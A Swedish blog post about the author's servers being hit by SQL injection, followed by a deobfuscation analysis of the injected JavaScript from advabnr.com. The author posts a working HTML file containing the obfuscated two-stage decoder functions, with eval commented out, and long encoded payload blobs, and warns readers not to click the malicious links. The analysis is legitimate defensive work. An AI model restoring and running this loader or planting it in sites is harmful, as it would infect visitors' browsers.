fredag 13 juni 2008

Kaos på jobbet, http://www.advabnr.com/ deobfuscated.

Det är alltid lika härligt när man kommer till kontoret efter ett par dagars sjukfrånvaro och upptäcker att några kineser har varit elaka och lekt SQL-Injection på servrarna, efter ett par vändors letande och pillandes dök det upp javascriptsfiler tex. http://www.advabnr.com/b.js (jag rekommenderar inte att den som läser detta inlägg klickar på några länkar som serveras i detta blogg-inlägg)

Denna JS-fil refererar till http://advabnr.com/cgi-bin/index.cgi?ad (stage1) vilket i sig är ytterligare ett javascript fullt med obfuscated kod, en stund senare och en del reserverande så visar det sig att stage1 kort och gott genererade ytterligare en bit obfuscated kod (stage2) vilket dock gick fortare att läsa ut.

Det som följer är min temp-fil som användes vid de-obfuscating av filerna i sig, stage1 och stage2 finns båda med i filen och det är relativt lätt för den som är "insatt" att följa vad som händer, 'farlig' kod är borttagen och filen i sig är harmlös, det enda som görs är en console.log av det som skapas i scriptet.

(Kod som följer är html-safe och utan text-indent)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
var hashkey = "function Vx0IAH138(I7M8YgayI, G38g3p7iO){var X25ks5E5u = 4294967296;var GpRRpt2uv = arguments.callee;GpRRpt2uv = GpRRpt2uv.toString();GpRRpt2uv = GpRRpt2uv + location.href;var nQ412XaP8 = eval;var XP4WWej4F = GpRRpt2uv.replace(/\W/g, \"\");XP4WWej4F = XP4WWej4F.toUpperCase();var VflJFmoSM = new Array;for(var qOFI57SQB = 0; qOFI57SQB < 256; qOFI57SQB++) {VflJFmoSM[qOFI57SQB] = 0;}var ohD16ibkU = 1;for(var qOFI57SQB = 128; qOFI57SQB; qOFI57SQB >>= 1) {ohD16ibkU = ohD16ibkU >>> 1 ^ (ohD16ibkU & 1 ? 3988292384 : 0);for(var tucbfU06P = 0; tucbfU06P < 256; tucbfU06P += qOFI57SQB * 2) {var s8gXebs60 = qOFI57SQB + tucbfU06P;VflJFmoSM[s8gXebs60] = VflJFmoSM[tucbfU06P] ^ ohD16ibkU;if (VflJFmoSM[s8gXebs60] < 0) {VflJFmoSM[s8gXebs60] += X25ks5E5u;}}}var a85pKx3C5 = X25ks5E5u - 1;for(var EB7Im12x0 = 0; EB7Im12x0 < XP4WWej4F.length; EB7Im12x0++) {var q44dw7IBH = (a85pKx3C5 ^ XP4WWej4F.charCodeAt(EB7Im12x0)) & 255;a85pKx3C5 = (a85pKx3C5 >>> 8) ^ VflJFmoSM[q44dw7IBH];}a85pKx3C5 = a85pKx3C5 ^ (X25ks5E5u - 1);if (a85pKx3C5 < 0) {a85pKx3C5 += X25ks5E5u;}a85pKx3C5 = a85pKx3C5.toString(16).toUpperCase();while(a85pKx3C5.length < 8) {a85pKx3C5 = \"0\" + a85pKx3C5;}var kQo6JB5WR = new Array;for(var qOFI57SQB = 0; qOFI57SQB < 8; qOFI57SQB++) {kQo6JB5WR[qOFI57SQB] = a85pKx3C5.charCodeAt(qOFI57SQB);}var BiC0TV1f6 = \"\";var lKjvOh8TW = 0;for(var qOFI57SQB = 0; qOFI57SQB < I7M8YgayI.length; qOFI57SQB += 2){var s8gXebs60 = I7M8YgayI.substr(qOFI57SQB, 2);var OU5aO5F3X = parseInt(s8gXebs60, 16);var An08HVDpW = OU5aO5F3X - kQo6JB5WR[lKjvOh8TW];if(An08HVDpW < 0) {An08HVDpW = An08HVDpW + 256;}BiC0TV1f6 += String.fromCharCode(An08HVDpW);if(lKjvOh8TW + 1 == kQo6JB5WR.length) {lKjvOh8TW = 0;} else {lKjvOh8TW++;}}var KgrV653I7 = 0;try {nQ412XaP8(BiC0TV1f6);} catch(e) {KgrV653I7 = 1;}try {if (KgrV653I7) {window.location = \"/\";}} catch(e) {}}";
var hashkey2 = "function gN73Os7rj(ox7QTs8Gt, ag6yPdJEC){var TW6EE2JE0 = 4294967296; var N3fJvS3EU = arguments.callee;N3fJvS3EU = N3fJvS3EU.toString();N3fJvS3EU = N3fJvS3EU + location.href;var Y0Y266h6o = eval;var rPvK1n6y8 = N3fJvS3EU.replace(/\W/g, \"\");rPvK1n6y8 = rPvK1n6y8.toUpperCase();var kd34hv8lb = new Array;for(var I47PSww6v = 0; I47PSww6v < 256; I47PSww6v++) {kd34hv8lb[I47PSww6v] = 0;}var I0Y3LC81s = 1;for(var I47PSww6v = 128; I47PSww6v; I47PSww6v >>= 1) {I0Y3LC81s = I0Y3LC81s >>> 1 ^ (I0Y3LC81s & 1 ? 3988292384 : 0);for(var nLFFcAHJl = 0; nLFFcAHJl < 256; nLFFcAHJl += I47PSww6v * 2) {var kD052e50w = I47PSww6v + nLFFcAHJl;kd34hv8lb[kD052e50w] = kd34hv8lb[nLFFcAHJl] ^ I0Y3LC81s;if (kd34hv8lb[kD052e50w] < 0) {kd34hv8lb[kD052e50w] += TW6EE2JE0;}}}var NGOlENwso = TW6EE2JE0 - 1;for(var d8O0bR2KA = 0; d8O0bR2KA < rPvK1n6y8.length; d8O0bR2KA++) {var g3gDRk0FD = (NGOlENwso ^ rPvK1n6y8.charCodeAt(d8O0bR2KA)) & 255;NGOlENwso = (NGOlENwso >>> 8) ^ kd34hv8lb[g3gDRk0FD];}NGOlENwso = NGOlENwso ^ (TW6EE2JE0 - 1);if (NGOlENwso < 0) {NGOlENwso += TW6EE2JE0;}NGOlENwso = NGOlENwso.toString(16).toUpperCase();while(NGOlENwso.length < 8) {NGOlENwso = \"0\" + NGOlENwso;}var B51cE2gJG = new Array;for(var I47PSww6v = 0; I47PSww6v < 8; I47PSww6v++) {B51cE2gJG[I47PSww6v] = NGOlENwso.charCodeAt(I47PSww6v);}var F60UrJ4CE = \"\";var xVNicY002 = 0;for(var I47PSww6v = 0; I47PSww6v < ox7QTs8Gt.length; I47PSww6v += 2){var kD052e50w = ox7QTs8Gt.substr(I47PSww6v, 2);var P72IU0651 = parseInt(kD052e50w, 16);var Khs56S3Hb = P72IU0651 - B51cE2gJG[xVNicY002];if(Khs56S3Hb < 0) {Khs56S3Hb = Khs56S3Hb + 256;}F60UrJ4CE += String.fromCharCode(Khs56S3Hb);if(xVNicY002 + 1 == B51cE2gJG.length) {xVNicY002 = 0;} else {xVNicY002++;}}var sJ7rjoWYl = 0;try {Y0Y266h6o(F60UrJ4CE);} catch(e) {sJ7rjoWYl = 1;}try {if (sJ7rjoWYl) {window.location = \"/\";}} catch(e) {}}";


function gN73Os7rj(ox7QTs8Gt, ag6yPdJEC){var TW6EE2JE0 = 4294967296; var N3fJvS3EU = hashkey2;N3fJvS3EU = N3fJvS3EU.toString();N3fJvS3EU = N3fJvS3EU + "http://advabnr.com/cgi-bin/index.cgi?ad";var Y0Y266h6o = eval;var rPvK1n6y8 = N3fJvS3EU.replace(/\W/g, "");rPvK1n6y8 = rPvK1n6y8.toUpperCase();var kd34hv8lb = new Array;for(var I47PSww6v = 0; I47PSww6v < 256; I47PSww6v++) {kd34hv8lb[I47PSww6v] = 0;}var I0Y3LC81s = 1;for(var I47PSww6v = 128; I47PSww6v; I47PSww6v >>= 1) {I0Y3LC81s = I0Y3LC81s >>> 1 ^ (I0Y3LC81s & 1 ? 3988292384 : 0);for(var nLFFcAHJl = 0; nLFFcAHJl < 256; nLFFcAHJl += I47PSww6v * 2) {var kD052e50w = I47PSww6v + nLFFcAHJl;kd34hv8lb[kD052e50w] = kd34hv8lb[nLFFcAHJl] ^ I0Y3LC81s;if (kd34hv8lb[kD052e50w] < 0) {kd34hv8lb[kD052e50w] += TW6EE2JE0;}}}var NGOlENwso = TW6EE2JE0 - 1;for(var d8O0bR2KA = 0; d8O0bR2KA < rPvK1n6y8.length; d8O0bR2KA++) {var g3gDRk0FD = (NGOlENwso ^ rPvK1n6y8.charCodeAt(d8O0bR2KA)) & 255;NGOlENwso = (NGOlENwso >>> 8) ^ kd34hv8lb[g3gDRk0FD];}NGOlENwso = NGOlENwso ^ (TW6EE2JE0 - 1);if (NGOlENwso < 0) {NGOlENwso += TW6EE2JE0;}NGOlENwso = NGOlENwso.toString(16).toUpperCase();while(NGOlENwso.length < 8) {NGOlENwso = "0" + NGOlENwso;}var B51cE2gJG = new Array;for(var I47PSww6v = 0; I47PSww6v < 8; I47PSww6v++) {B51cE2gJG[I47PSww6v] = NGOlENwso.charCodeAt(I47PSww6v);}var F60UrJ4CE = "";var xVNicY002 = 0;for(var I47PSww6v = 0; I47PSww6v < ox7QTs8Gt.length; I47PSww6v += 2){var kD052e50w = ox7QTs8Gt.substr(I47PSww6v, 2);var P72IU0651 = parseInt(kD052e50w, 16);var Khs56S3Hb = P72IU0651 - B51cE2gJG[xVNicY002];if(Khs56S3Hb < 0) {Khs56S3Hb = Khs56S3Hb + 256;}F60UrJ4CE += String.fromCharCode(Khs56S3Hb);if(xVNicY002 + 1 == B51cE2gJG.length) {xVNicY002 = 0;} else {xVNicY002++;}} var sJ7rjoWYl = 0;console.log(F60UrJ4CE); try {Y0Y266h6o(F60UrJ4CE);} catch(e) {sJ7rjoWYl = 1;}try {if (sJ7rjoWYl) {window.location = "/";}} catch(e) {}}

function Vx0IAH138(var1, var2)
{
var hash = 4294967296;
var GpRRpt2uv = hashkey;
GpRRpt2uv = GpRRpt2uv.toString();
GpRRpt2uv = GpRRpt2uv + "http://advabnr.com/cgi-bin/index.cgi?ad"; //location.href;
var nQ412XaP8 = eval;
var XP4WWej4F = GpRRpt2uv.replace(/\W/g, "");
XP4WWej4F = XP4WWej4F.toUpperCase();
var VflJFmoSM = new Array;
for(
var qOFI57SQB = 0; qOFI57SQB < 256; qOFI57SQB++)
{
VflJFmoSM[qOFI57SQB] = 0;
}
var ohD16ibkU = 1;
for(var qOFI57SQB = 128; qOFI57SQB; qOFI57SQB >>= 1)
{
ohD16ibkU = ohD16ibkU >>> 1 ^
(ohD16ibkU & 1 ? 3988292384 : 0);
for(
var tucbfU06P = 0; tucbfU06P < 256; tucbfU06P += qOFI57SQB * 2)
{
var s8gXebs60 = qOFI57SQB + tucbfU06P;VflJFmoSM[s8gXebs60] = VflJFmoSM[tucbfU06P] ^ ohD16ibkU;
if (VflJFmoSM[s8gXebs60] < 0) {VflJFmoSM[s8gXebs60] += hash;}
}
}
var a85pKx3C5 = hash - 1;
for(
var EB7Im12x0 = 0; EB7Im12x0 < XP4WWej4F.length; EB7Im12x0++)
{
var q44dw7IBH = (a85pKx3C5 ^ XP4WWej4F.charCodeAt(EB7Im12x0)) & 255;
a85pKx3C5 = (a85pKx3C5 >>> 8) ^ VflJFmoSM[q44dw7IBH];
}
a85pKx3C5 = a85pKx3C5 ^ (hash - 1);
if (a85pKx3C5 < 0) {
a85pKx3C5 += hash;
}
a85pKx3C5 = a85pKx3C5.toString(16).toUpperCase();
while(a85pKx3C5.length < 8)
{
a85pKx3C5 = "0" + a85pKx3C5;
}
var kQo6JB5WR = new Array;
for(
var qOFI57SQB = 0; qOFI57SQB < 8; qOFI57SQB++)
{
kQo6JB5WR[qOFI57SQB] = a85pKx3C5.charCodeAt(qOFI57SQB);
}
var BiC0TV1f6 = "";
var lKjvOh8TW = 0;
for(var qOFI57SQB = 0; qOFI57SQB < var1.length; qOFI57SQB += 2)
{
var s8gXebs60 = var1.substr(qOFI57SQB, 2);
var OU5aO5F3X = parseInt(s8gXebs60, 16);
var An08HVDpW = OU5aO5F3X - kQo6JB5WR[lKjvOh8TW];
if(An08HVDpW < 0)
{
An08HVDpW = An08HVDpW + 256;
}
BiC0TV1f6 += String.fromCharCode(An08HVDpW);
if(lKjvOh8TW + 1 == kQo6JB5WR.length)
{
lKjvOh8TW = 0;
} else {
lKjvOh8TW++;
}
}
console.log(BiC0TV1f6);
var KgrV653I7 = 0;
try {
//nQ412XaP8(BiC0TV1f6); <- Eval
}
catch(e) {
KgrV653I7 = 1;
}
try {
if (KgrV653I7)
{
//window.location = "/";
}
}
catch(e) {}
}
console.log("New\n");
//Load stage1 <body onload="Vx0IAH138('a8B8a093b5A2a3B462AA80677488a77db4AD5a9FB970859Ab57B79A46D5995AD78BC82948b7e776Fbdb993a2618d8B7C8788647A866954836277646975726A7D747C686Bb79Aa6669076987ab78C678b97636F50A2AB9bbbAFa8a0a4B46797A7aeAF97957C8767ac8cB98563868e5483629165968baf8779879860A4b08CA8b8abB199586a748279a88DA883747E89667f638063A783aa99758887506c59A0B5A5a4a699B0a762aeB4A8986Bb79Aa6669b738B62776F9c7Cb1636F50A6af95B27db993a261ab84bc8d74A066ba715483629165968Baf8779879860A2a6a9a0A7A5a85A5f9D9063AD6e6354526a74A696b88e639E77B26C667F63A480b78465B478BC6A5eb5A889b6B2A8A473A2ac996e6b7EA891b3599FAA75779aa679A596667f63A095B85975B8B4a4ab6Ba7A8A66Eb8a4a4508A6D6B9695BAA966b7597166727E527975708499b9BA68a66175547877796d508a6D6b9695BAA966B7645f6F62be9d94746D9CBC7aAF948b8A6D6b9695baa966B796548362736dadb79aA6668b738B638d7c6C77b5636f5072749ab5b46bA891b3597D7A799385A7b86fAA667F6363627974548F767A8283B8b06abc7d637B64788987BDb979A8507f777166736C52AB8A698d798E866A61B45971668B738b638D7c6C77b563706E7F596566a0635A7971926792857B63a3615F5477628252637A716C787b75656875596E66726C6d96B0ab5CbcA3B5529E8d7F7AA9838B7c9C617654767d63a07c877F97878a8d9E507d59667B787e529E8D7f7aA9838b7c9C616471668B77698094b0AB7cB8635C50736254C1B8a4a450ac7d647b74A86760B85971668B77698094b0AB7cb8635d50AF857A8cA5847a7AAD749faa75779Aa679a596a1AD876265739e6976B9A0526d61A4987976ABA868AD9B8fB48e89789382817eB29f6390508a698d798E866A61B4749DAC626b9D94746D9cbc7aaf948bac7D647B74a86760b896548262735b50bcA4987976abA868AD9B8Fb186736762a66e64BD9F635d6D618d8B7C8788647a86696fC3BFC0a891b359828d91AF777EB8ACA3667F638687777E79788C8862506e596581A8B2a458B79aA666A67B8160a38B669183636f50717454aa7A926292936B7F87627F52a291af7f77b079ab686FA599b4A9b79a6b619D6c9572a584628C7A5F716b63ADA6A2ab54AD75aa7682ac697a8A628052588F8083B28791A9a3B0599266B493A87b72A76ABF7a719598a2AB77B5a6a873A4699D6c9572A584628c7A5D6F62695262766e6F9489929E758fb0a7b5628052588f8083b28791a9A3B059728480636A59619754b1a6766698b771a0a89daa6597858B9F7688878F6bbe877B95AE8880a7b4A854836291797Fad7e82bdb5B2528e6161889d788877628b7E64666f6363597Ca29A666A91797fAD7e82BDb5B2526C61695D66BD91797Fad7E82bdB5B2525b7E59889D788877628B7E6481BF91797fAD7E82bdb5b2526D61877B95ae8880a7B4A862bab196A6A2AAa79B6e73795B5eB5a889B6b2A8a473a2ac996e6b7ea998AAA5996E908A819C8687ABb9B1719e95afa0a8AE627f52686a59af9489929e758fb0a7B562805252715b54716291797Fad7E82bdb5B26Dadb79AA66684786393866B9B9089636F50af9eAB6683B5A491ba749Ab5B46bA891b3597D7a799385A7b86FAA667F63626B6182687D9296a9a777AF5482627b6D508a6D6B9695BAa966B7645f6f62be7465729c7978A98d798b8A6d6b9695baa966B79654836291797fAD7e82bdb5B26093A99aa689b1a79771b5617D7A799385a7B86fAA6F7dC0A891B3597A7c7298A47a757c79667f6354527Caf95B862BB887EAA9c8d767275526D61696FACb1b55aa6a2AB548f767a8283b8b06Abc628052607C597D7A799385a7B86Faa667E63A1a8788A88b97A8Aa65ead9ea2adB6AB6D508a6d6B9695BAA966b7595f8362755babb79aa666ad876265739e6976B9636f50b0B16B9796b66A77B567A7bba4B6a6A26982687d9296a9A777af6066746C6DA6a2ab549679757B85716f6977628052a0a2aba7AB8Bb1a658ac7D647B74A86760B8655477786C6Da6a2ab5491AAB66766946c7ca862805280786b7D9B72796761616654887774957573A07e8d9dbb887eaa9c8d7672758f6BAA9F5c91aab66766946C7CA8627F52606a59af91AAb66766946C7CA86280527ba9AC697c95767A926164547877796Dad876F649bB48d667386595f836296a6a2aaA79b74a8b5a19D84A195b885b2969569849cB977798563899B5D81aba95Aa897879da99b7362626164547762806F50836E65A98775997a8867a0ABb0AAa6986A59AFBE98919b939A696478628052607CB654ABAEB69750BCb18A94ABA68B60716b5f717Dc0AFa6A2ab54b98c7Aa49Ab0908dB2628052607cADA6bf62be8B609A6B6A7caa79a158876f649bB48d667386626FC362a693A4A4A15Cab6B63ada38B70a6B0b19a8B9c617654777Dc0A6a2ba59AFAFa8635aa38b70a6B0B19a8b9c6A59afBDABB1969Fb867A0B5A5a4A699b0a75483626561527cb6B166a5A4A693A961996f62BEafad4bA0827d7592a567B3A35C6d777367607a7B758878766871766e6d7c84759369A2709678A37b9460A2716a767aa67475799a6d787B769361787E6D7C78a66866A29d697876A76696749e957eA3777468766B767B7b7C6965776D6A7A7aA96B717A7E68ab7a736862769B6A7878846A61747F688Ca47C9363826f6978A3a96b60786D6C8A7ba569717A6f6dAA76A66a63766B6Aa979766962767B6A8A777367608271957c847868627A716A7e7b7669917A6D967e79a67363747D6aac78766894776B6b7b78846974756A6789A47c9367826d6a7b84746b67799b6C7A7b786B74776C6D7676866976766D697f7976696676726C7677736673756a67A9847A7468827b6a7bA4A86696749E6788a37c9465a26d6a7b78A574687A6E757a7876949277706D7f7aA76969796D6c787B876A63776B6c76847b696779716ba979A46b66796B6d8C798994607A6E957Ea3a693947A6C967f84759464776B9578a3A994927A7295ABa4749465776b6d8Ba37B74647A72767fa3A5699482726a7D7b7A6b6077726d7B7b766b73767F698A78a66866827D697876876672747d957e83777468766B758c84786B92787b6b7e84876976786D6A7b7A736862a26b6D79a47c73767A72757C847a9461a26F6A76A4769462a27075898386946082706cAA847b6992796F6cAC79A46B62796d6cA9A37369648269757Ca4737367777f678C76876696749b697876a76672747d6da8837c6866769A967b7B7C6965776D6a7A7a896B917a9e6A7b7a736976766d6a787876687376716A7B83879464799d6b7f7a7C9560779B6C7D79747372826b6D7cA37B7475796a95a878A56864796e957d838673697a9d6d7Fa3a693967A72697a78866866766C6c7878766896776E698878769561749f68AC76866672749d957ea3777468766b6c7DA4A69366799E6d7C7a7b9461a2716a7B7a736862826D6D79a47874697A706cab84747466767C6D8984786B7678726C88a4A76992786F6A7684787372826b7677837773657A72698779757362786f6B7aA3a46895769b697f78866876779D697876a76696747E6788768666767A9B95a878766871786f95A8a37a73607a6f6cA783887468766D6B7678766966767b6A7ba4A86696747e678876866676747B767B7b7C6965776D6a7A7A896b717A7e6a7b7A736862786f7588837a73607A6f6CA783889468776b757cA4756b69A26f967da3a674607a7b698779776993769b6c7676A66672747d67A877736760749B68ab76867476756A67a976A66696a29F697876a76676747e67A876A673767a716a7B78A57375789e6b7A7A856B95779a957d83886862786A6a8C78766894776b6b7b78846862767a697E78769460826d6dAB7a846A68827E6a887a7869647A9B7679837A9367a29c6C77a37C6895766D6c7cA37A94617A6F6d7D78766A677a6e967d847593647a6E757C78786896766b6a7C7A736862776a6A7978A66866827d697876876672747D6788A3A79468797b6cA97A7c7473777D6B7a78766a63766b7679a37794687A9D6D7FA3779491826a767d797494628269957d838493968269967e7BA8746777726C7C7A876974796B6D7b7ba76B76776B6d7c837b74697a6E767D8386746282716dA884757464777d697876876696749E678876A666767a7b95a8787668717a9E757A7B866a947871768c79A66A64776B6D88847473717a7096AA7b759368769c697a78766972766D6a8B78766863786a697879736967769b6A7b84886676749E67a876866676747B76777A876a64787C6Ca7798593687a9d6A7b7a736862769B6A78797B6894777D697876876672749D6788A57368667a70767784797367766d6D88A37C6866769a758C84786B72787B6B7E84876996786D6b79838674607A716d7D84856B657A716aaa78786862777A697a78a66866766c6c7878766876776e698878767561749F688C76A66692747D67a8a3A96b60786d6C8a7B8569917A6f6d8a78766a63766b6A8979766968767B6a8A77736760747B68ab76867476766D6d7Da3A994697A706A7Ba3A69368766d69a783877468797B6ca97A7c7473777d6B7a797473768269757fa37b9491796c6d7e78A56868766b6b8978786892766D69797A736866769f6B7c78a66862A29F678c76A76676747B688b76a67375787e6B7a7Aa56B95777a957D83886862786a69787884696677726Aa979A86696747e67a876a66696a29F6a7b837b939582706d7d78769561747f68ac76866672749d678883896B60786D6Caa7bA569717a6f6d8a78766a63766B6aa979766963767B6aaa77736760749b68AB76a67476756a678976866696827F697876876676749e67A876a693967a716a7B78859366779a6C78797a9368A26E6bAB83776862786A6AAC78766894776b6b7b78846862769A697e78767460826d6DAB7A846a68a29E6a887a7869647A9b7679A37a7367827C6c77837c6875766D6D7eA3A594617A706DAAa4A493678271758778766a6882696D79a4797375766D6A8b78766863786a697879736967769B6A7ba4A86676749E678876a666968271957ca4786862827295a8797c9464776F6B8A7b846A74766D6A8c7876689476726C7677736693749D67a876869460a26D6dAB7aa46A68827e6AA87A786866777F6A7BA4749363a29a6Da8A3A49367a26F767a84786960A26D6d8bA47b73747A9B967984796b94a2726A7D7b7a6B6077726D7B7B766b937a6a6a76837a9392826E957eA4787372a26d957c8386946582696c7677736673756a678976866676747b95a884757464767c957e83779468766b768C84796967a29a957b7B73747378706A7B7A736862776d6aaa78769560A26e6ba7a47C9465796A757e7A7b6866777E6A7b83877464797D6b7f7A7C7560777b6c7d797473757A729576A3A474717A9a6c767876747382706A7DA47c7469789f96a87a7B6874767f698878769561749F68AC76866672749d6788A47c9367826d6A7B7A866A647A9d6bA87aA59394797a6D7D78766996766D6D8984786b9678726C8884876992786F6a76837993957a6c967D7A777466767C7589847969728271967e7B7374687872698879886763749C697876876692749d6788768673767A716a7b78A568637A7d757b7b74736779696a8aa4767363A26F757bA37B6A76A269767f78A56A92786f6d887AA66A757a726D8a7b786892769D697884899562766B6a8A7aA66A647A9D6BA87a859394797a6D7D78766996786A69787884696476726a7b787C6868766d957Da4a6697382696b7f79856B69789F6A76a3A97372a2697589847A7371766d6B7678766966767b6aAB78769494756a67a976a66676749b68AB76869467a29d6a7E84746971777a6d897a886862769f6Aac78766a96786D758b7a866a917A9b6CA77B786a61749f68ac76866672747d6788857368667A70967784797367766d6d88837c6866769A96A784866968a26B6a7C79a56B74787d6B79a3a97367a26b6D7fa47a7375766B6C7978766962767D6978A4a86763747C68ab76A66672747D6788A37874687A70757c83886994756A678976a66676747B68aba5736696747e678876866676827F697876A76696747E6788768666968271957c84786862787E6b7B847a7360A29c6B7f79a59368766D6aAC78767472A29b6b8884746966779c6c7f7a886964826e767bA3A99392a27169877884696476726AAB79886676749E67AC76a76696749B68ABa3A69368766D69877A876a69826F6DACa4a76966779C6D7e7B886966799F6A7B79A96862779D698878769561747f68AC76866672749D6788A37a6973796B6b7F83789465779D6D7978766a63766b6A8979a49365769B6A8A77736760749b688b76867476766d6D7d838994697a706A7B83869368766d69877A876a69a26F6dACA4A76966779c6d7e7B886966799f6a7b7a736996766D6aa87876687376716A7B7Aa76A65a2716C89A4a76991777A75887Ba869637A6a69787a736A63766b6B7b78766868767a69787a876a69826F6dac84876966779c6D7E7Ba86968799F6a7B79896862776e6A79797b6866767b6A7ba4A86696749e678876866676747b957f797C6B6277716D7aa47969767a6C6A7B7a736862769b6A7f79796894779D697876A76692749d67a8a5736763749C68ab76867476756A67A977736760749B68aba3A69368766d69A783896b60786d6c8A7ba569917A6f6d8A78766867779F6a7B79766862769A697E7876746679716B7e7976696479696C7C83896866766C6c7878766962766D697e787C68667a6F6B887b7669667a6F757b79a69367766b6a7C7a736862776d698878769561747F688C76866672747d6d7A847873727A6c767679886696747E678876A69563749F688C76A67476756a6789857368667A6E957c847a73657A7C6987a37b6876766B777678769496756a67a977736760826F967d84866862A29F67ac76a766967A7b758878766891A26b6D79847C93967a72757C847a9461a26F6A76847393967A9f95A77B7a9492a26D6D7d84797361766d7688A3a693667A72957779759495767F967884796876827b6dAC847c6868797f6b79837B74607a6E6D7Aa3A973727a6f6d7b838994677a9b6dA8a4746876747f68AC76866692a26B6C7D7b846b68796d6DA979776a94766d6A8c78766894776B6B7C78846994756a6789857368667A6E957C847A93657a7c6987837b6896766B777678769496756A67A977736760A272758A838693957A7269a7A4766b93776e6B7B79786a9579716dab797474627a707679a3A494667a9C697879a96866779A6a8b77736693747d95787B7C6969776B6B7D7aa96b66826969787a73686676726b7B78a46862769f697884766b73776e6b7B79786A7579716D8B79886763747C697876876696747e957eA3779468766b967aA3a97471A29e6B7ba47869687a9e6A7b7a7368627a719577837994927a9F95a784747466776b6D7ba47873727A6C967F837B6a67a2696d7d847373728269767F78A56864A2706D7b84787376826B967f78786872779F678C76a794657A7E768a84876A65A26f6a7AA3a96964A26E95a7A47A6a638271757C847873767A6D96a7847A7367767c697Aa47A9496a26B758778786895766D697A847A9392827a967f797573737A6E957e837794697a6e767Da3A67462A271697A78a66a61749f688C84757375827C75897a797468776d7677797474657a72757C7a777471826F767Da3a693648272757ca37b6875766D767eA4789365766f698B787668687A9A967fA47a9462779E6A77797573677a6f7688A3779364A26B957A79749369826a9678797593657a7b6da8797393687a7B767979759392A26b6d7c837B74757769757e83849392786c6AA879766966779a6B89797B9368777d6A7879a469917A716b7B79776964776d6A7879766994777295A7797673677A716A7D79A56966776d6b7B79766962776d6A7879766966776b6B7b79787366777C6a7d79A6697677706ba8837793687A9A6A7879766868766B6b7678769462799a6A7B79766968789E6D7f83896862767F6978A4746b7279726D7d7B786b69776E6b8A78766961766B96777aa76a64789c6c8779a573687A7d6A7B788868627a716A7e7b7669917a6D767e79867363769d6A8a77736760749f688c837A94617a70957da4739392A269967F79747364826C6D7Ca4a669647a6c767B84767367826B6d7C7A7973757a7b9677a37A6871A26c6dAB84859560786e967d79789395767D6A8a77736760827f697876A759597C')">
//Load stage2 <body onload="gN73Os7rj('50509BAB636A5596B2a9a7b2a8b0a8608cBE8a9293a17E966c66ad524d4f3ea8a4B852B5997564648f9A9E4e80625b626A813F4Fb9a3A652af90748D9b7A969d4c83526c73725B6D5050A8a6B5629868937a94b87cA33D6f636d62756A7D413Cb9a7A465B1978b84959D63904C7F545973765980504C413cB7B8AB65be4f3e3Ba9b5a4656bB895A463bb67998d7984829D836280B877887c7a96829F7Fb095a8acad93b9B2b462a2afbb99aeb1b5629Ea8B499B9ab7dA96797906995939C5F5D6c66AD524D4B3Da8A4B852AFB59b7B78BD7F74658062a293b9AF99A6B7b1a660b3b2a7ACACb0A78dB87b868f7a92848ca074A0A6b0A76F3F4D4f3b524d4B3D9bA9665ab5997564648F9a9e65807F5462636C5865ADb48d7989c06b8771ABA296a8BE81ab6b6485a7ACA99d99acaf99546C665382636f655B63c13f4f4C4B3da8a4B85287bca68e9688b1a8658062A493b5B9978eB1B65C9CB59F798Bbd7b7660B5ABA2B1A4A5995A72A27674aa6e5b596C6F6d524d4f3E3B4C4F9bab636A76aba7A0968aAEB8547063765B65be4f3E3B4C4F3BB5997564648F9A9E65806276ABA7A0968aAEb862A6b299a6b7acB09B5A747c5b804c4B3D3b50503b4e4CBF413c4c4faf524d4F3E3b4cAF98656bAE7e748B9e6aa7AE62716F636d62756A625A5863b0A49e8A88AE6B85749bB3A7a7ac81a96e5486a7b19697638795b7B2a495A6656f5266806261636c66AD524D4B3D3Badb88B8c89BC6D74638352B3a4b89d99a4baA1B771b2A0a7AAafA0b89eB769868D7D82959d9F6296A8B995B7ACB2A89bB2B46D524D4f3e3B4c4F9Bab636A9eA49C8d78BF7c84629BB1AA97bd92a85c54637B546E6363715270775b65BE4F3e3b4C4F3BB18D847C8a7Ba89d6580625b62786d6D524D4B3d3Bc06697B1B6A7549Ba9665aAFB59B7B78BD7f7473ACB09897BB95986d65626A546c665382636F655B63C13f4F4c4b3D3baf90748D9B7a969D6383526C73785B6D50503B4e4CBF5497afb99765aca8545aADB88B8c89BC6D7471AFA0A9a8ba83986b68527C656b545380665f766c62af3F4d4F3B4E4cAE7E748b9e6Aa7AE6271526A76696c7e4f3E3b4c4faf65A8aeA79763c13F4f4C4B3d3BAF90748d9b7A969D6383526c73735B6d50503b4e4cBF413C4C4fAF524D4F3e3b4caf98656Ba66a8277a8a57eA462716f636d62756A625a5863B0A49e8A88ae6B85749bB3a7A7AC81A96E5498abb1979dbaa7A8AA6388A093b6AE546E6363715270775b65be4F3e3B4c4fA8a6b562A9ab79b4667D9A8D546F636d5980504c3d3b4Cb0a49e8a88AE6b85666F65b1a3aa9baaa7a6B4B570a49Eb8AD9bb3B69da96797906995939c9160A7abA5a8b5ABa4a6ACb5A080504C413C4C4F3BabB2B45Ca8A4b852BFB677aaa590BC77658062646d63c0a57ab9b581A888666E65ADB48D7989C06B8771AE99a0aaBA9a8063BCA767b9B97fbb886D5F5B63c13f4f4C4B3d3Bb9a7A4658C849d7b8bad8A97637f549CB59f798BBD7b7660A6ae93b784B65CACB67BA8b890B8795B7E533c524D4b3d3B4CAF98656b639DA591A7806Db3A3a6A5a88Fa0B96b8b769B8c8E999D956b5d52BFc2526D8c849d7b8Bad8A97637f71526A745965696854a7bc7CA0797B997f60afABa0ACB7AA547063765B6e63bd413c4c4F3b4e4Cb7ad68B17A6A9C8E625f6f638f74AE8C8a9b8a95813f4f4C4B3D3BC06697b1B6A7549BA9665abaBC78a2667b9D7D73afA7a299b7AE528363725D52be533C4e4c4B3D3Ba5B897A6AE7d413C4c4F3B4ec04f3E3B4C4FAF524d4f3E3B4C4fA8a6B5627E75B7A0ac797ba8546f63BBab7BB1766c898E74A5B5afaba85A6A74596e7E4F3e3f4d4f3b4eaca8545A8D89A69fbd766c989E768f657f626d5B63c13F4f4C4B3d3Ba77C8279A5b56d936383526C7aa55b6D50503b4E4CBF5497AFb99765ACa8545A8D89a69fbd766c989E768f65807f546b636C58658d85a88Cbd7a6AAB9e7391528083527563685A528D89A69fBD766c989e788f657F62656378665B65be4f3e3B4C4F3Ba979926894b67F936580625b69766d6d524d4